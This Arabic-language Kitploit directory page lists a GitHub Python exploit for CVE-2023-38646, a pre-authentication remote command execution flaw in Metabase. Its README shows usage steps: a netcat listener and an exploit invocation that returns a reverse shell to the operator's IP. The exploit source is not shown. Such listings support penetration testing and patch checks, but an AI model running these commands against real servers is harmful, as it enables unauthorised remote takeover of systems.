Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-38646 — نص استغلال Python لثغرة CVE-2023-38646، وهي ثغرة تنفيذ أوامر عن بُعد قبل المصادقة في Metabase، تسلم شل عكسية إلى مضيف يتحكم فيه المهاجم. | Kitploit
أدوات/GitHubGitHub/passwa11/cve-2023-38646
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubpasswa11/cve-2023-38646

CVE-2023-38646

نص استغلال Python لثغرة CVE-2023-38646، وهي ثغرة تنفيذ أوامر عن بُعد قبل المصادقة في Metabase، تسلم شل عكسية إلى مضيف يتحكم فيه المهاجم.

عرض المستودع
6منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-38646-exploit

"هذه الثغرة، المعيّنة برقم CVE-2023–38646، سمحت للمهاجمين بتنفيذ أوامر عشوائية على الخادم دون الحاجة إلى أي مصادقة."

نص برمجي سريع لاستغلال الصدفة العكسية لـ cve-2023-38646. لم أكتشف هذه الثغرة، بل صنعت السكربت فقط.

الاستخدام

root@box:~/CVE-2023-38646# python3 exploit.py

   _______      ________    ___   ___ ___  ____       ____   ___    __ _  _     __

/ ____\ \    / /  ____|  |__ \ / _ \__ \|___ \     |___ \ / _ \  / /| || |   / /
| |     \ \  / /| |__ ______ ) | | | | ) | __) |_____ __) | (_) |/ /_| || |_ / /_
| |      \ \/ / |  __|______/ /| | | |/ / |__ <______|__ < > _ <| '_ \__   _| '_ \
| |____   \  /  | |____    / /_| |_| / /_ ___) |     ___) | (_) | (_) | | | | (_) |
\_____|   \/   |______|  |____|\___/____|____/     |____/ \___/ \___/  |_|  \___/

author: c0rnbread
credits:
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
https://raw.githubusercontent.com/kh4sh3i/CVE-2023-38646/main/CVE-2023-38646.py

شغّل باستخدام عنوان URL الأساسي وعنوان IP المحلي والمنفذ للحصول على الصدفة العكسية

root@box:~/CVE-2023-38646# nc -lvnp 4444

root@box:~/CVE-2023-38646# python3 exploit.py http://example.com 10.10.10.2 4444

الاعتمادات

https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

https://raw.githubusercontent.com/kh4sh3i/CVE-2023-38646/main/CVE-2023-38646.py

تنزيل الأداة